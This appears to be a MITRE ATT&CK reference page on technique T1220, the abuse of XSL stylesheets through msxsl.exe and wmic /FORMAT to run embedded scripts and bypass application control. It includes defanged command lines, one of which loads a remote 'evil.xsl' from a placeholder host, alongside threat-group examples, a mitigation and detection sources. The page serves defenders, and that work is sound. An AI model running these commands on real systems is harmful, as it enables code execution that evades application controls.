Skip to content

T1220 XSL Script Processing

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. 7

Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) 4 can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. 5 Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. 1 Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.6

Command-line examples:56

  • msxsl.exe customers[.]xml script[.]xsl
  • msxsl.exe script[.]xsl script[.]xsl
  • msxsl.exe script[.]jpeg script[.]jpeg

Another variation of this technique, dubbed “Squiblytwo”, involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file.3 This technique can also execute local/remote scripts and, similar to its Regsvr32/ “Squiblydoo” counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.6

Command-line examples:63

  • Local File: wmic process list /FORMAT:evil[.]xsl
  • Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
Item Value
ID T1220
Sub-techniques
Tactics TA0005
Platforms Windows
Version 1.2
Created 17 October 2018
Last Modified 05 May 2022

Procedure Examples

ID Name Description
S0373 Astaroth Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. 8
G0080 Cobalt Group Cobalt Group used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.9
G0126 Higaisa Higaisa used an XSL file to run VBScript code.10
C0022 Operation Dream Job During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.11

Mitigations

ID Mitigation Description
M1038 Execution Prevention If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.

Detection

ID Data Source Data Component
DS0011 Module Module Load
DS0009 Process Process Creation

References